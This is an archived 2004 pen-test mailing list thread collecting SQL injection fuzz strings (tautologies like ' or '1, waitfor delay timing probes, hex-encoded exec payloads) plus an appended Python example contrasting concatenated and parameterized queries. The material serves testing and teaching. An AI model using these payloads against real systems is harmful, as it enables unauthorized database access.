Re: SQL Injection Strings

From: Marcus (x-ray@twlc.net)
Date: Mon Jun 28 2004 - 02:08:39 EDT


I know one that works.
 ' or '1
 ' or ' 1

Marcus
----- Original Message -----
From: Jeremy Junginger <jj@act.com>
To: <pen-test@securityfocus.com>
Sent: Friday, June 25, 2004 12:01 PM
Subject: SQL Injection Strings

Good Morning,

I'm customizing an http proxy that's feeding some POST parameters into web
forms to test for SQL injections. I figured this would be the group to help
put together a comprehensive list of "fuzz strings" to feed into the forms to
test them. Here's what I have so far. I know it's far from complete.
Please add any additional strings that you think may be helpful, or perhaps a
link to an archived thread that has already discussed this?!?:

'sqlvuln
'+sqlvuln
sqlvuln;
(sqlvuln)
a' or 1=1--
a" or 1=1--
a" or "a" = "a
a' or 'a' = 'a
1 or 1=1
a' waitfor delay '0:0:10'--
1 waitfor delay '0:0:10'--
declare @q nvarchar (4000) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000
declare @s varchar(22) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
declare @q nvarchar (4000) select @q = 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e exec(@s)

And if you're feeling even more generous, perhaps you have some suggestions
on checking the response. I'm doing a regex search for the following to
determine interesting strings. Of course I still have to take a look at some
of the 200 responses to see if the waitfor and version commands worked :)

HTTP/[0-9].[0-9] 500
[Ee]rror
(My)?SQL

Thanks guys!

-Jeremy
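
Added example (not part of the thread, written here to illustrate it): a small Python/sqlite3 login check that feeds Marcus's `' or '1` and two of Jeremy's strings through a query built by string concatenation and through a parameterized query, showing why the strings match every row in the first case and are just unmatched literal passwords in the second. The users table and accounts are constructed sample data.

```python
import sqlite3

# Constructed sample data standing in for the web form's backend table.
SAMPLE_USERS = [("alice", "s3cret"), ("bob", "hunter2")]


def make_db():
    """Build an in-memory SQLite database with the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_concat(conn, name, password):
    """Vulnerable: form fields are spliced into the SQL text, so a quote in
    the input closes the literal and the remainder is parsed as SQL."""
    sql = ("SELECT name FROM users WHERE name = '" + name
           + "' AND password = '" + password + "'")
    return [row[0] for row in conn.execute(sql)]


def login_param(conn, name, password):
    """Hardened: placeholders bind the fields as data; the engine never
    re-parses them, so a quote is just a character in the value."""
    sql = "SELECT name FROM users WHERE name = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (name, password))]


def probe(conn, payload):
    """Submit one string from the thread as the password field through both
    code paths and return the rows each one yields."""
    return {
        "concat": login_concat(conn, "alice", payload),
        "param": login_param(conn, "alice", payload),
    }


if __name__ == "__main__":
    db = make_db()
    for s in ["' or '1", "a' or 1=1--", "a' or 'a' = 'a"]:
        print(repr(s), probe(db, s))
```

The `--` in `a' or 1=1--` works because the trailing quote the application appends is swallowed as a comment; the same engine that accepts it as SQL treats it as an ordinary string once the value is bound through a placeholder.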



This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:57 EDT